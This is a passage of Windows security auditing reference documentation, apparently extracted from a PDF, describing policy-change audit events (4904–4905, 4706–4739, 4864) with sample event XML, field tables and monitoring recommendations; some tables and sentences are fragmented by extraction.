Subcategory GUID [Type = GUID ]: the unique GUID of changed subcategory.
To see subcategory GUID you can use the following command: “auditpol /list /subcategory:* /v”:
Changes [Type = UnicodeString]: changes which were made for the subcategory. Possible values are:
Success include removed
Success include added
Failure include removed
Failure include added
Success exclude removed
Success exclude added
Failure exclude removed
Failure exclude added

For 4912(S ): Per User Audit Policy was changed.
If you use the Per-user audit feature, then this event should be always monitored, especially on high value
assets or computers. If this change was not planned, investigate the reason for the change.
If you don’t use the Per-user audit feature, then this event should be always monitored because it indicates
use of the Per-user audit feature outside of your standard procedures.
4904(S): An attempt was made to register a security
event source.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time a new security
event source is registered.
You can typically see this event during system
startup, if specific roles (Internet Information
Services, for example) are installed in the
system.

Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="AuditSourceName">FSRM Audit</Data>
<Data Name="EventSourceId">0x1cc4e</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to register a security event source. Event
Account Name [Type = UnicodeString]: the name of the account that made an attempt to register a
security event source.
the following:
Process:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted to register the security
event source. Process ID (PID ) is a number used by the operating system to uniquely identify an active
column):
Event Source:
Source Name [Type = UnicodeString]: the name of registered security event source. You can see all
registered security event source names in this registry path:
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security”. Here is an example:
Event Source ID [Type = HexInt64]: the unique hexadecimal identifier of registered security event source.

For 4904(S ): An attempt was made to register a security event source.
If you have a pre-defined list of allowed security event sources for specific computers or computer types,
then you can use this event and check whether “Event Source\Source Name”is in your defined list.
4905(S): An attempt was made to unregister a
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time a security
event source is unregistered.
You typically see this event if specific roles
were removed, for example, Internet
Information Services.

Event XML:
- <System>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="AuditSourceName">IIS-METABASE</Data>
<Data Name="EventSourceId">0x20c15f</Data>
<Data Name="ProcessId">0xd90</Data>
<Data Name="ProcessName">-</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to unregister a security event source. Event
Account Name [Type = UnicodeString]: the name of the account that made an attempt to unregister a
the following:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted to unregister the
security event source. Process ID (PID ) is a number used by the operating system to uniquely identify an
active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column):
Event Source:
Source Name [Type = UnicodeString]: the name of unregistered security event source. You can see all
registered security event source names in this registry path:
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security”. Here is an example:
Event Source ID [Type = HexInt64]: the unique hexadecimal identifier of unregistered security event
source.

For 4905(S ): An attempt was made to unregister a security event source.
If you have a list of critical security event sources which should never have been unregistered, then you can
use this event and check the “Event Source\Source Name.”
Applies to
Windows 10
Windows Server 2016
Audit Authentication Policy Change determines whether the operating system generates audit events when
changes are made to authentication policy.
Changes made to authentication policy include:
Creation, modification, and removal of forest and domain trusts.
Changes to Kerberos policy under Computer Configuration\Windows Settings\Security Settings\Account
Policies\Kerberos Policy.
When any of the following user logon rights is granted to a user or group:
Access this computer from the network
Allow logon locally
Allow logon through Remote Desktop
Logon as a batch job
Logon as a service
Namespace collision, such as when an added trust collides with an existing namespace name.
This setting is useful for tracking changes in domain-level and forest-level trust and privileges that are granted
to user accounts or groups.
Event volume: Low.
STRONGER STRONGER
STRONGER STRONGER
Domain Yes No Yes No On domain

Controller controllers, it is
important to
enable Success
audit for this
subcategory to
be able to get
information
related to
operations with
domain and
forest trusts,
changes in
Kerberos policy
and some other
events included
in this
subcategory.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Member Server Yes No Yes No On member

servers it is
important to
enable Success
audit for this
subcategory to
be able to get
information
related to
changes in user
logon rights
policies and
password policy
changes.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Workstation Yes No Yes No On workstations

it is important to
enable Success
audit for this
subcategory to
be able to get
information
related to
changes in user
logon rights
policies and
password policy
changes.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4670(S ): Permissions on an object were changed
4706(S ): A new trust was created to a domain.
4707(S ): A trust to a domain was removed.
4716(S ): Trusted domain information was modified.
4713(S ): Kerberos policy was changed.
4717(S ): System security access was granted to an account.
4718(S ): System security access was removed from an account.
4739(S ): Domain Policy was changed.
4864(S ): A namespace collision was detected.
4865(S ): A trusted forest information entry was added.
4866(S ): A trusted forest information entry was removed.
4867(S ): A trusted forest information entry was modified.
4706(S): A new trust was created to a domain.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy
Change
Event Description:
This event generates when a new trust was
created to a domain.
This event is generated only on domain
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DomainName">corp.contoso.local</Data>
<Data Name="DomainSid">S-1-5-21-2226861337-2836268956-2433141405</Data>
<Data Name="SubjectLogonId">0x3e99d6</Data>
<Data Name="TdoType">2</Data>
<Data Name="TdoDirection">3</Data>
<Data Name="TdoAttributes">32</Data>
<Data Name="SidFilteringEnabled">%%1796</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “create domain trust” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “create domain trust”
operation.
the following:
Trusted Domain:
Domain Name [Type = UnicodeString]: the name of new trusted domain.
Domain ID [Type = SID ]: SID of new trusted domain. Event Viewer automatically tries to resolve SIDs and
show the account name. If the SID cannot be resolved, you will see the source data in the event.
Trust Information:
Trust Type [Type = UInt32]: the type of new trust. The following table contains possible values for this field:
VALUE ATTRIBUTE VALUE DESCRIPTION
1 TRUST_TYPE_DOWNLEVEL The domain controller of the trusted

domain is a computer running an
operating system earlier than Windows
2000.
2 TRUST_TYPE_UPLEVEL The domain controller of the trusted

domain is a computer running Windows
2000 or later.
3 TRUST_TYPE_MIT The trusted domain is running a non-

Windows, RFC4120-compliant Kerberos
distribution. This type of trust is
distinguished in that (1) a SID is not
required for the TDO, and (2) the
default key types include the DES-CBC
and DES-CRC encryption types (see
[RFC4120] section 8.1).
4 TRUST_TYPE_DCE The trusted domain is a DCE realm.

Historical reference, this value is not
used in Windows.
Trust Direction [Type = UInt32]: the direction of new trust. The following table contains possible values for this
field:
0 TRUST_DIRECTION_DISABLED The trust relationship exists, but it has

been disabled.
1 TRUST_DIRECTION_INBOUND The trusted domain trusts the primary

domain to perform operations such as
name lookups and authentication.
2 TRUST_DIRECTION_OUTBOUND The primary domain trusts the trusted

3 TRUST_DIRECTION_BIDIRECTIONAL Both domains trust one another for

operations such as name lookups and
authentication.
Trust Attributes [Type = UInt32]: the decimal value of attributes for new trust. You need convert decimal value
to hexadecimal and find it in the table below. The following table contains possible values for this field:
0x1 TRUST_ATTRIBUTE_NON_TRANSITIVE If this bit is set, then the trust cannot be

used transitively. For example, if domain
A trusts domain B, which in turn trusts
domain C, and the A<-->B trust has
this attribute set, then a client in
domain A cannot authenticate to a
server in domain C over the A<-->B<--
>C trust linkage.
0x2 TRUST_ATTRIBUTE_UPLEVEL_ONLY If this bit is set in the attribute, then

only Windows 2000 operating system
and newer clients may use the trust
link. Netlogon does not consume trust
objects that have this flag set.
0x4 TRUST_ATTRIBUTE_QUARANTINED_DO If this bit is set, the trusted domain is

MAIN quarantined and is subject to the rules
of SID Filtering as described in [MS-
PAC] section 4.1.2.2.
0x8 TRUST_ATTRIBUTE_FOREST_TRANSITIVE If this bit is set, the trust link is a cross-

forest trust [MS-KILE] between the root
domains of two forests, both of which
are running in a forest functional level
of DS_BEHAVIOR_WIN2003 or greater.
Only evaluated on Windows Server
2003 operating system, Windows
Server 2008 operating system,
Windows Server 2008 R2 operating
system, Windows Server 2012
operating system, Windows Server
2012 R2 operating system, and
Windows Server 2016 operating
system.
Can only be set if forest and trusted
forest are running in a forest functional
level of DS_BEHAVIOR_WIN2003 or
greater.
0x10 TRUST_ATTRIBUTE_CROSS_ORGANIZATI If this bit is set, then the trust is to a

ON domain or forest that is not part of the
organization. The behavior controlled by
this bit is explained in [MS-KILE] section
3.3.5.7.5 and [MS-APDS] section 3.1.5.
2003, Windows Server 2008, Windows
Server 2008 R2, Windows Server 2012,
Windows Server 2012 R2, and Windows
Server 2016.
greater.
0x20 TRUST_ATTRIBUTE_WITHIN_FOREST If this bit is set, then the trusted domain

is within the same forest.
Server 2016.
0x40 TRUST_ATTRIBUTE_TREAT_AS_EXTERNA If this bit is set, then a cross-forest trust

L to a domain is to be treated as an
external trust for the purposes of SID
Filtering. Cross-forest trusts are more
stringently filtered than external trusts.
This attribute relaxes those cross-forest
trusts to be equivalent to external
trusts. For more information on how
each trust type is filtered, see [MS-PAC]
section 4.1.2.2.
Server 2016.
Only evaluated if SID Filtering is used.
Only evaluated on cross-forest trusts
having
TRUST_ATTRIBUTE_FOREST_TRANSITIVE.
greater.
0x80 TRUST_ATTRIBUTE_USES_RC4_ENCRYPT This bit is set on trusts with the

ION trustType set to TRUST_TYPE_MIT,
which are capable of using RC4 keys.
Historically, MIT Kerberos distributions
supported only DES and 3DES keys
([RFC4120], [RFC3961]). MIT 1.4.1
adopted the RC4HMAC encryption type
common to Windows 2000 [MS-KILE],
so trusted domains deploying later
versions of the MIT distribution
required this bit. For more information,
see "Keys and Trusts", section 6.1.6.9.1.
Only evaluated on TRUST_TYPE_MIT
0x200 TRUST_ATTRIBUTE_CROSS_ORGANIZATI If this bit is set, tickets granted under

ON_NO_TGT_DELEGATION this trust MUST NOT be trusted for
delegation. The behavior controlled by
this bit is as specified in [MS-KILE]
section 3.3.5.7.5.
Only supported on Windows Server
2012, Windows Server 2012 R2, and
0x400 TRUST_ATTRIBUTE_PIM_TRUST If this bit and the TATE bit are set, then
a cross-forest trust to a domain is to be
treated as Privileged Identity
Management trust for the purposes of
SID Filtering. For more information on
how each trust type is filtered, see [MS-
Evaluated only on Windows Server
2016
Evaluated only if SID Filtering is used.
Evaluated only on cross-forest trusts
having
Can be set only if the forest and the
trusted forest are running in a forest
functional level of
DS_BEHAVIOR_WINTHRESHOLD or
greater.
SID Filtering [Type = UnicodeString]: SID Filtering state for the new trust:
Enabled
Disabled

For 4706(S ): A new trust was created to a domain.
Any changes related to Active Directory domain trusts (especially creation of the new trust) must be monitored
and alerts should be triggered. If this change was not planned, investigate the reason for the change.
4707(S): A trust to a domain was removed.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates when a domain trust was
removed.
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DomainName">FABRIKAM</Data>
<Data Name="SubjectLogonId">0x3e99d6</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “remove domain trust” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “remove domain trust”
operation.
the following:
Domain Information:
Domain Name [Type = UnicodeString]: the name of removed trusted domain.
Domain ID [Type = SID ]: SID of removed trusted domain. Event Viewer automatically tries to resolve SIDs

For 4707(S ): A trust to a domain was removed.
Any changes related to Active Directory domain trusts (especially trust removal) must be monitored and alerts
4716(S): Trusted domain information was modified.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates when the trust was
modified.
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DomainName">-</Data>
<Data Name="TdoType">2</Data>
<Data Name="TdoDirection">3</Data>
<Data Name="TdoAttributes">32</Data>
<Data Name="SidFilteringEnabled">-</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “modify domain trust settings” operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested the “modify domain trust
settings” operation.
the following:
Trusted Domain:
Domain Name [Type = UnicodeString]: the name of changed trusted domain. If this attribute was not
changed, then it will have “-“ value.
Domain ID [Type = SID ]: SID of changed trusted domain. Event Viewer automatically tries to resolve SIDs
New Trust Information:
Trust Type [Type = UInt32]: the type of new trust. If this attribute was not changed, then it will have “-“ value or
its old value. The following table contains possible values for this field:
1 TRUST_TYPE_DOWNLEVEL The domain controller of the trusted

domain is a computer running an
operating system earlier than Windows
2000.
2 TRUST_TYPE_UPLEVEL The domain controller of the trusted

domain is a computer running Windows
2000 or later.
3 TRUST_TYPE_MIT The trusted domain is running a non-

Windows, RFC4120-compliant Kerberos
distribution. This type of trust is
distinguished in that (1) a SID is not
required for the TDO, and (2) the
default key types include the DES-CBC
and DES-CRC encryption types (see
[RFC4120] section 8.1).
4 TRUST_TYPE_DCE The trusted domain is a DCE realm.

Historical reference, this value is not
used in Windows.
Trust Direction [Type = UInt32]: the direction of new trust. If this attribute was not changed, then it will have
“-“ value or its old value. The following table contains possible values for this field:
0 TRUST_DIRECTION_DISABLED The trust relationship exists, but it has

been disabled.
1 TRUST_DIRECTION_INBOUND The trusted domain trusts the primary

2 TRUST_DIRECTION_OUTBOUND The primary domain trusts the trusted

3 TRUST_DIRECTION_BIDIRECTIONAL Both domains trust one another for

operations such as name lookups and
authentication.
Trust Attributes [Type = UInt32]: the decimal value of attributes for new trust. You need convert decimal value
to hexadecimal and find it in the table below. If this attribute was not changed, then it will have “-“ value or its
old value. The following table contains possible values for this field:
0x1 TRUST_ATTRIBUTE_NON_TRANSITIVE If this bit is set, then the trust cannot be

used transitively. For example, if domain
A trusts domain B, which in turn trusts
domain C, and the A<-->B trust has
this attribute set, then a client in
domain A cannot authenticate to a
server in domain C over the A<-->B<--
>C trust linkage.
0x2 TRUST_ATTRIBUTE_UPLEVEL_ONLY If this bit is set in the attribute, then

only Windows 2000 operating system
and newer clients may use the trust
link. Netlogon does not consume trust
objects that have this flag set.
0x4 TRUST_ATTRIBUTE_QUARANTINED_DO If this bit is set, the trusted domain is

MAIN quarantined and is subject to the rules
of SID Filtering as described in [MS-
0x8 TRUST_ATTRIBUTE_FOREST_TRANSITIVE If this bit is set, the trust link is a cross-

forest trust [MS-KILE] between the root
domains of two forests, both of which
are running in a forest functional level
of DS_BEHAVIOR_WIN2003 or greater.
2003 operating system, Windows
Server 2008 operating system,
system, Windows Server 2012
operating system, Windows Server
2012 R2 operating system, and
Windows Server 2016 operating
system.
greater.
0x10 TRUST_ATTRIBUTE_CROSS_ORGANIZATI If this bit is set, then the trust is to a

ON domain or forest that is not part of the
organization. The behavior controlled by
this bit is explained in [MS-KILE] section
3.3.5.7.5 and [MS-APDS] section 3.1.5.
Server 2016.
greater.
0x20 TRUST_ATTRIBUTE_WITHIN_FOREST If this bit is set, then the trusted domain

is within the same forest.
Server 2016.
0x40 TRUST_ATTRIBUTE_TREAT_AS_EXTERNA If this bit is set, then a cross-forest trust

L to a domain is to be treated as an
external trust for the purposes of SID
Filtering. Cross-forest trusts are more
stringently filtered than external trusts.
This attribute relaxes those cross-forest
trusts to be equivalent to external
trusts.
Server 2016.
Only evaluated if SID Filtering is used.
Only evaluated on cross-forest trusts
having
greater.
0x80 TRUST_ATTRIBUTE_USES_RC4_ENCRYPT This bit is set on trusts with the

ION trustType set to TRUST_TYPE_MIT,
which are capable of using RC4 keys.
Historically, MIT Kerberos distributions
supported only DES and 3DES keys
([RFC4120], [RFC3961]). MIT 1.4.1
adopted the RC4HMAC encryption type
common to Windows 2000 [MS-KILE],
so trusted domains deploying later
versions of the MIT distribution
required this bit. For more information,
see "Keys and Trusts", section 6.1.6.9.1.
Only evaluated on TRUST_TYPE_MIT
0x200 TRUST_ATTRIBUTE_CROSS_ORGANIZATI If this bit is set, tickets granted under

ON_NO_TGT_DELEGATION this trust MUST NOT be trusted for
delegation. The behavior controlled by
this bit is as specified in [MS-KILE]
section 3.3.5.7.5.
Only supported on Windows Server
2012, Windows Server 2012 R2, and
0x400 TRUST_ATTRIBUTE_PIM_TRUST If this bit and the TATE bit are set, then
a cross-forest trust to a domain is to be
treated as Privileged Identity
Management trust for the purposes of
SID Filtering. For more information on
how each trust type is filtered, see [MS-
Evaluated only on Windows Server
2016
Evaluated only if SID Filtering is used.
Evaluated only on cross-forest trusts
having
Can be set only if the forest and the
trusted forest are running in a forest
functional level of
DS_BEHAVIOR_WINTHRESHOLD or
greater.
SID Filtering [Type = UnicodeString]: SID Filtering state for the new trust:
Enabled
Disabled
If this attribute was not changed, then it will have “-“ value or its old value.

For 4716(S ): Trusted domain information was modified.
Any changes in Active Directory domain trust settings must be monitored and alerts should be triggered. If this
change was not planned, investigate the reason for the change.
4713(S): Kerberos policy was changed.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates when Kerberos
policy was changed.
controllers.

for this event.
Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="KerberosPolicyChange">KerMaxT: 0x10c388d000 (0x861c46800); KerMaxR: 0x19254d38000 (0xc92a69c000);
</Data>
</EventData>
</Event>
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to Kerberos policy. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that made a change to Kerberos policy.
the following:
Changes Made [Type = UnicodeString]: '--' means no changes, otherwise each change is shown as:
Parameter_Name: new_value (old_value). Here is a list of possible parameter names:
PARAMETER NAME DESCRIPTION
KerProxy 1. Maximum tolerance for computer clock synchronization.

To convert the KerProxy to minutes you need to:
Convert the value to decimal value.
Divide value by 600000000.
KerMaxR 1. Maximum lifetime for user ticket renewal.

To convert the KerProxy to days you need to:
PARAMETER NAME DESCRIPTION
KerMaxT 1. Maximum lifetime for user ticket.

To convert the KerMaxT to hours you need to:
KerMinT 1. Maximum lifetime for service ticket.

To convert the KerMinT to minutes you need to:
KerOpts - Enforce user logon restrictions:

0x80 – Enabled
0x0 - Disabled
This event shows changes in “Kerberos policy”. Here is location of Kerberos policies in Group Policy management
console:

For 4713(S ): Kerberos policy was changed.
Any changes in Kerberos policy reported by current event must be monitored and an alert should be triggered.
If this change was not planned, investigate the reason for the change.
4717(S): System security access was granted to an
account.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates every time local logon
user right policy is changed and logon right
was granted to an account.
You will see unique event for every user if
logon user rights were granted to multiple
accounts.

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="AccessGranted">SeInteractiveLogonRight</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to local logon right user policy. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made a change to local logon right
user policy.
the following:
Account Modified:
Account Name [Type = SID ]: the SID of the security principal for which logon right was granted. Event Viewer
**Access Granted: **
Access Right [Type = UnicodeString]: the name of granted logon right. This event generates only for logon
rights, which are as follows:
VALUE GROUP POLICY NAME
SeNetworkLogonRight Access this computer from the network
SeRemoteInteractiveLogonRight Allow logon through Terminal Services
SeDenyNetworkLogonRight Deny access to this computer from the network
SeDenyBatchLogonRight Deny logon as a batch job
SeDenyServiceLogonRight Deny logon as a service
SeDenyInteractiveLogonRight Deny logon locally
SeDenyRemoteInteractiveLogonRight Deny logon through Terminal Services
SeBatchLogonRight Log on as a batch job
SeServiceLogonRight Log on as a service
SeInteractiveLogonRight Log on locally

For 4717(S ): System security access was granted to an account.
Actions typically performed by the SYSTEM account: This Because this event is typically triggered by the SYSTEM
event and certain other events should be monitored to see if account, we recommend that you report it whenever
they are triggered by any account other than SYSTEM. “Subject\Security ID” is not SYSTEM.
local accounts for which you need to monitor each action. “Account Modified\Account Name” that correspond to the
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Security ID” that
used.
If you have specific user logon rights policies, for example, a
whitelist of accounts that can log on to certain computers,
monitor this event to confirm that any “Access Right” was
granted only to the appropriate “Account Modified\Account
Name.”
certain actions are performed only by certain account types, certain account types, review the “Subject\Security ID” and
for example, local or domain account, machine or user “Account Modified\Account Name” to see whether the
For example, if non-service accounts should never be granted
certain logon rights (for example, SeServiceLogonRight),
monitor this event for those accounts and rights.
events).
people (accounts) should perform only limited actions, or no concerned about. Also be sure to check “Account
actions at all. Modified\Account Name” to see whether logon rights
should be granted to that account.
For high-value servers or other computers, we recommend
that you track this event and investigate whether the specific
“Access Right” should be granted to “Account
Modified\Account Name” in each case.
Logon rights that should be restricted: You might have a Monitor this event and compare the “Access Right” to your
list of user logon rights that you want to monitor (for example, list of restricted rights.
SeServiceLogonRight).
4718(S): System security access was removed from an
account.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates every time local logon
user right policy is changed and logon right
was removed from an account.
You will see unique event for every user if
logon user rights were removed for multiple
accounts.

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="AccessRemoved">SeInteractiveLogonRight</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made a change to local logon right user policy. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made a change to local logon right
user policy.
the following:
Account Modified:
Account Name [Type = SID ]: the SID of the security principal for which logon right was removed. Event
**Access Removed: **
Access Right [Type = UnicodeString]: the name of removed logon right. This event generates only for logon
rights, which are as follows:
VALUE GROUP POLICY NAME
SeNetworkLogonRight Access this computer from the network
SeRemoteInteractiveLogonRight Allow logon through Terminal Services
SeDenyNetworkLogonRight Deny access to this computer from the network
SeDenyBatchLogonRight Deny logon as a batch job
SeDenyServiceLogonRight Deny logon as a service
SeDenyInteractiveLogonRight Deny logon locally
SeDenyRemoteInteractiveLogonRight Deny logon through Terminal Services
SeBatchLogonRight Log on as a batch job
SeServiceLogonRight Log on as a service
SeInteractiveLogonRight Log on locally

For 4718(S ): System security access was removed from an account.
local accounts for which you need to monitor each action. “Account Modified\Account Name” that correspond to the
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Security ID” that
used.
If you have specific user logon rights policies, for example, a
whitelist of accounts that can log on to certain computers,
monitor this event to confirm that it was appropriate that the
“Access Right” was removed from “Account
Modified\Account Name.”
for example, local or domain account, machine or user “Account Modified\Account Name” to see whether the
For example, if critical remote network service accounts have
user logon rights which should never be removed (for
example, SeNetworkLogonRight), monitor this event for the
“Account Modified\Account Name” and the appropriate
rights.
As another example, if non-service accounts should never be
granted certain logon rights (for example,
SeServiceLogonRight), you might monitor this event,
because a right can be removed only after it was previously
granted.
events).
people (accounts) should perform only limited actions, or no concerned about. Also be sure to check “Account
actions at all. Modified\Account Name” to see whether logon rights
should be removed from that account.
“Access Right” should be removed from “Account
Modified\Account Name” in each case.
Logon rights that should be restricted: You might have a - Monitor this event and compare the “Access Right” to your
list of user logon rights that you want to monitor (for example, list of restricted rights.
SeServiceLogonRight). Monitor this event to discover the removal of a right that
“Deny” rights that should not be removed: Your should never have been granted, so that you can investigate
organization might use “Deny” rights that should not be further.
removed, for example, SeDenyRemoteInteractiveLogonRight. You can also monitor this event to discover the removal of
“Deny” rights. When these rights are removed, it could be an
approved action, done by mistake, or part of malicious activity.
These rights include:
SeDenyNetworkLogonRight:
SeDenyBatchLogonRight
SeDenyServiceLogonRight
SeDenyInteractiveLogonRight
SeDenyRemoteInteractiveLogonRight
4739(S): Domain Policy was changed.
Applies to
Windows 10
Windows Server 2016
Change
Event Description:
This event generates when one of the following
changes was made to local computer security
policy:
Computer’s “\Security Settings\Account
Policies\Account Lockout Policy” settings
were modified.
Computer's “\Security Settings\Account
Policies\Password Policy” settings were
modified.
"Network security: Force logoff when logon
hours expire" group policy setting was
changed.
Domain functional level was changed or
some other attributes changed (see details
in event description).

Event XML:
- <System>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="DomainPolicyChanged">Password Policy</Data>
<Data Name="DomainName">CONTOSO</Data>
<Data Name="MinPasswordAge">-</Data>
<Data Name="MaxPasswordAge">-</Data>
<Data Name="ForceLogoff">-</Data>
<Data Name="LockoutThreshold">-</Data>
<Data Name="LockoutObservationWindow">-</Data>
<Data Name="LockoutDuration">-</Data>
<Data Name="PasswordProperties">-</Data>
<Data Name="MinPasswordLength">-</Data>
<Data Name="PasswordHistoryLength">13</Data>
<Data Name="MachineAccountQuota">-</Data>
<Data Name="MixedDomainMode">-</Data>
<Data Name="DomainBehaviorVersion">-</Data>
<Data Name="OemInformation">-</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Change Type [Type = UnicodeString]: the type of change which was made. The format is “policy_name
modified”. These are some possible values of policy_name:
VALUE GROUP POLICY NAME \ DESCRIPTION
Lockout Policy Computer’s “\Security Settings\Account Policies\Account

Lockout Policy” settings were modified.
Password Policy Computer's “\Security Settings\Account Policies\Password

Policy” settings were modified.
Logoff Policy "Network security: Force logoff when logon hours expire"
group policy setting was changed.
VALUE GROUP POLICY NAME \ DESCRIPTION
- Machine Account Quota (ms-DS-MachineAccountQuota)

domain attribute was modified.
Subject:
Security ID [Type = SID ]: SID of account that made a change to specific local policy. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made a change to specific local
policy.
the following:
Domain:
Domain Name [Type = UnicodeString]: the name of domain for which policy changes were made.
Domain ID [Type = SID ]: the SID of domain for which policy changes were made. Event Viewer automatically
the event.
Changed Attributes: For attributes which were not changed the value will be “-“.
Min. Password Age [Type = UnicodeString]: “\Security Settings\Account Policies\Password Policy\Minimum
password age” group policy. Numeric value.
Max. Password Age [Type = UnicodeString]: “\Security Settings\Account Policies\Password
Policy\Maximum password age” group policy. Numeric value.
Force Logoff [Type = UnicodeString]: “\Security Settings\Local Policies\Security Options\Network security:
Force logoff when logon hours expire” group policy.
Lockout Threshold [Type = UnicodeString]: “\Security Settings\Account Policies\Account Lockout
Policy\Account lockout threshold” group policy. Numeric value.
Lockout Observation Window [Type = UnicodeString]: “\Security Settings\Account Policies\Account
Lockout Policy\Reset account lockout counter after” group policy. Numeric value.
Lockout Duration [Type = UnicodeString]: “\Security Settings\Account Policies\Account Lockout
Policy\Account lockout duration” group policy. Numeric value.
Password Properties [Type = UnicodeString]:
VALUE GROUP POLICY SETTINGS
0 \Security Settings\Account Policies\Password Policy\Store

passwords using reversible encryption - Disabled.
\Security Settings\Account Policies\Password Policy\Password
must meet complexity requirements – Disabled.

passwords using reversible encryption - Disabled.
must meet complexity requirements – Enabled.

passwords using reversible encryption - Enabled.
must meet complexity requirements – Disabled.

passwords using reversible encryption - Enabled.
must meet complexity requirements – Enabled.
Min. Password Length [Type = UnicodeString]: “\Security Settings\Account Policies\Password

Policy\Minimum password length” group policy. Numeric value.
Password History Length [Type = UnicodeString]: “\Security Settings\Account Policies\Password
Policy\Enforce password history” group policy. Numeric value.
Machine Account Quota [Type = UnicodeString]: ms-DS -MachineAccountQuota domain attribute was
modified. Numeric value.
Mixed Domain Mode [Type = UnicodeString]: there is no information about this field in this document.
Domain Behavior Version [Type = UnicodeString]: msDS -Behavior-Version domain attribute was
modified. Numeric value. Possible values:
DOMAIN CONTROLLER OPERATING

SYSTEMS THAT ARE ALLOWED IN THE
VALUE IDENTIFIER DOMAIN
0 DS_BEHAVIOR_WIN2000 Windows 2000 Server operating system

Windows Server 2003 operating system
system
system
DOMAIN CONTROLLER OPERATING
SYSTEMS THAT ARE ALLOWED IN THE
VALUE IDENTIFIER DOMAIN
1 DS_BEHAVIOR_WIN2003_WITH_MIXED Windows Server 2003

_DOMAINS Windows Server 2008
Windows Server 2012
Windows Server 2016
2 DS_BEHAVIOR_WIN2003 Windows Server 2003

Windows Server 2008
Windows Server 2012
Windows Server 2016

Windows Server 2012
Windows Server 2016
4 DS_BEHAVIOR_WIN2008R2 Windows Server 2008 R2

Windows Server 2012
Windows Server 2016

Windows Server 2016
6 DS_BEHAVIOR_WIN2012R2 Windows Server 2012 R2

Windows Server 2016
7 DS_BEHAVIOR_WINTHRESHOLD Windows Server 2016
OEM Information [Type = UnicodeString]: there is no information about this field in this document.
See full list of user privileges in the table below:

a process.

operations.
held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE




creation APIs.

account.
components.

a process.
interface.
to a process.
users.
driver.

memory.
computer account.
controllers.

defragmentation.

system processes.

network request.

held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
synchronization.
information.

processes.
clock.



a terminal device.

For 4739(S ): Domain Policy was changed.
Any settings changes to “Account Lockout Policy”, “Password Policy”, or “Network security: Force logoff
when logon hours expire”, plus any domain functional level and attributes changes that are reported by
this event, must be monitored and an alert should be triggered. If this change was not planned, investigate the
reason for the change.
4864(S): A namespace collision was detected.
Applies to
Windows 10
Windows Server 2016
This event is generated when a namespace collision was detected.
Subcategory: Audit Authentication Policy Change
Event Schema:
A namespace collision was detected.
Target Type:%1
Target Name:%2
Forest Root:%3
Top Level Name:%4
DNS Name:%5
NetBIOS Name:%6
Security ID:%7
*New Flags:%8 *
Event Versions: 0.

